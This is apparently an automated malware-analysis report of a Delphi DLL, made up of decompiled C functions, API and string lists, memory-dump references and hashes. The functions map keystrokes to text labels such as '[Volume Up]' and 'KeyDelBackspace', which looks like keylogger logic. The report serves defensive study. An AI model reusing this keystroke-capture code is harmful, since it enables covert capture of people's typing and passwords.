Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886
[Volume Mute], xrefs: 100076D4

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Volume Mute]
API String ID: 783433895-2344092975
Opcode ID: 455afcd6e3832ca7b84d94a3bb7d8776a597c069f1cf387fb9e20d828b192e7e
Instruction ID: 16984cad3dea769ffc9e719f0c3c6e6ae58df65779da4dd1961d81e5b5ee2c4d
Opcode Fuzzy Hash: 455afcd6e3832ca7b84d94a3bb7d8776a597c069f1cf387fb9e20d828b192e7e
Instruction Fuzzy Hash: 1231C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489724ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100076E0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 96
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100076E0(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, L"[Volume Up]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100076e0
0x100076e0
0x100076e7
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

[Volume Up], xrefs: 100076E2
Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad$[Volume Up]
API String ID: 783433895-1130620078
Opcode ID: 1396860a42cb380e9acc2e04de6d3966a62f39ee4fc40e43a8010b9064b996bb
Instruction ID: 44a22ba6fee8b4e9f78c922aeec61573fdb0a25af906651eec748b7687c73eda
Opcode Fuzzy Hash: 1396860a42cb380e9acc2e04de6d3966a62f39ee4fc40e43a8010b9064b996bb
Instruction Fuzzy Hash: A131C0B8B042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489724ECA78EE458761

Uniqueness

Uniqueness Score: -1.00%

Function 1000280C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
registryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E1000280C() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x1000e014 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x1000e014; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x1000e014 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E1000287D);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x10002884);
					return RegCloseKey(_v8);
				}
			}

0x1000280d
0x1000280f
0x10002819
0x10002835
0x10002884
0x10002896
0x10002899
0x100028a2
0x10002837
0x10002839
0x1000283a
0x1000283f
0x10002842
0x10002845
0x10002861
0x10002868
0x1000286b
0x1000286e
0x1000287c
0x1000287c

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 1000282E
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,1000287D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 10002861
RegCloseKey.ADVAPI32(?,10002884,00000000,?,00000004,00000000,1000287D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 10002877

Strings

FPUMaskValue, xrefs: 10002858
SOFTWARE\Borland\Delphi\RTL, xrefs: 10002824

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 2de27d201efc82a7483fe1fc3ca906961f394501151e49489695f63c5642027c
Instruction ID: 58881b6b02d8723bd0b6b44eaf0a35f8982818fe5ca11f09a28713a058d90beb
Opcode Fuzzy Hash: 2de27d201efc82a7483fe1fc3ca906961f394501151e49489695f63c5642027c
Instruction Fuzzy Hash: 7501F77D900249BAFB15DBA0CC42FE9B3BCEB08780F5040A1FB00E7598EB70AA50D765

Uniqueness

Uniqueness Score: -1.00%

Function 1000711C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E1000711C(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi, void* __eflags) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t130;

				_t104 = __edi;
				_t76 = __ebx;
				0x76();
				asm("adc [esi-0x3befff8a], dh");
				if (__eflags <= 0) goto L1;
				asm("adc dl, dl");
				if (__eflags <= 0) goto L2;
				asm("adc al, ah");
				if (__eflags <= 0) goto L3;
				asm("adc [ebx+0x78ccbac3], cl");
				E100037AC(__ebx, L"[Numpad +]");
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t129 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t129);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t130 = _t56;
					if(_t130 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t130 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x1000711c
0x1000711c
0x1000711c
0x10007123
0x10007129
0x1000712b
0x1000712d
0x1000712f
0x10007131
0x10007133
0x1000713b
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode
String ID: KeyDelBackspace$Numpad
API String ID: 470584828-3409537306
Opcode ID: d00852749f0fa98736970e4bd149b739843efba6f4ddf0c6cc158de6b8264dba
Instruction ID: 149ee91c77b329ac99fc9af66e0b3d6a30fb45bb34e994fec82f682e2bcf3d65
Opcode Fuzzy Hash: d00852749f0fa98736970e4bd149b739843efba6f4ddf0c6cc158de6b8264dba
Instruction Fuzzy Hash: B43123B8F042545BF722D7648C85B9F73A9FF892C0F10C096F5489724ECA78AE49CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100071AB, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100071AB(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, 0x10007980);
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100071ab
0x100071ab
0x100071b2
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad
API String ID: 783433895-3409537306
Opcode ID: f7aef9f21616257945c88be8e333fc38432ac4e89a882b8b49a9e8d0194266b7
Instruction ID: b9b3ae13005e08ec592b66eecad70d017cc54a4a4b75dc847ff917e2bac9dbd1
Opcode Fuzzy Hash: f7aef9f21616257945c88be8e333fc38432ac4e89a882b8b49a9e8d0194266b7
Instruction Fuzzy Hash: DF31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE49CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100071BC, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100071BC(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, 0x10007988);
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100071bc
0x100071bc
0x100071c3
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
0x1000788b
0x10007890
0x10007894
0x10007894
0x1000789b
0x1000789e
0x100078a1
0x100078b6

APIs

Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879

Strings

Numpad, xrefs: 10007712
KeyDelBackspace, xrefs: 10007722, 10007886

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Unicode$Virtual$AllocString
String ID: KeyDelBackspace$Numpad
API String ID: 783433895-3409537306
Opcode ID: 4ab29850c5f1ea5968f8bdd8de0f37538667ca36111ee2f0d472207cb48857ef
Instruction ID: 3a51f266618fbb6b802821ae4c3cebfa16a004a881c451f646cc2ee8cf1695e6
Opcode Fuzzy Hash: 4ab29850c5f1ea5968f8bdd8de0f37538667ca36111ee2f0d472207cb48857ef
Instruction Fuzzy Hash: 1231C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100071CD, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 97
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E100071CD(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
				int _t52;
				int _t56;
				intOrPtr* _t76;
				intOrPtr _t88;
				struct HKL__* _t104;
				struct HKL__* _t108;
				struct HKL__* _t112;
				int _t113;
				int _t115;
				void* _t118;
				int _t129;

				_t104 = __edi;
				_t76 = __ebx;
				E100037AC(__ebx, 0x10007990);
				E10003A34( *__ebx, 0);
				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
					E100037AC(__ebx, L"KeyDelBackspace");
				}
				 *((char*)(_t118 - 1)) = E10006D04();
				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
				if(_t113 <= 0) {
					__eflags = _t113;
					if(_t113 < 0) {
						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
						_t108 = _t104;
						_t115 = _t113;
						E100050D8();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t115;
						if(_t115 < 0) {
							do {
								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
								__eflags = _t52;
							} while (_t52 < 0);
						}
					}
				} else {
					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
					_t112 = _t104;
					E10003A34( *_t76, 0);
					if(0 == 0) {
						E100038E0(_t76, 0x80, _t118 - 0x30c);
						_t128 =  *((char*)(_t118 - 1));
						if( *((char*)(_t118 - 1)) == 0) {
							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
						} else {
							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
						}
					}
					_t56 =  *(_t118 - 0x20c);
					_t129 = _t56;
					if(_t129 != 0) {
						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
					}
					E100050D8();
				}
				E10003A34( *_t76, L"KeyDelBackspace");
				if(_t129 == 0) {
					E10003770(_t76);
				}
				_pop(_t88);
				 *[fs:eax] = _t88;
				_push(E100078BE);
				return E10003788(_t118 - 0x414, 2);
			}

0x100071cd
0x100071cd
0x100071d4
0x100076f0
0x100076f5
0x10007727
0x10007727
0x10007731
0x10007759
0x1000775d
0x1000780e
0x10007810
0x10007816
0x1000781f
0x10007836
0x10007838
0x10007839
0x10007845
0x1000784e
0x10007853
0x10007855
0x10007857
0x10007879
0x10007880
0x10007880
0x10007857
0x10007855
0x10007763
0x10007774
0x10007776
0x1000777b
0x10007780
0x1000778f
0x10007794
0x10007798
0x100077be
0x100077cb
0x1000779a
0x100077a2
0x100077af
0x100077af
0x10007798
0x100077d0
0x100077d6
0x100077d8
0x100077f8
0x100077f8
0x10007807
0x10007807
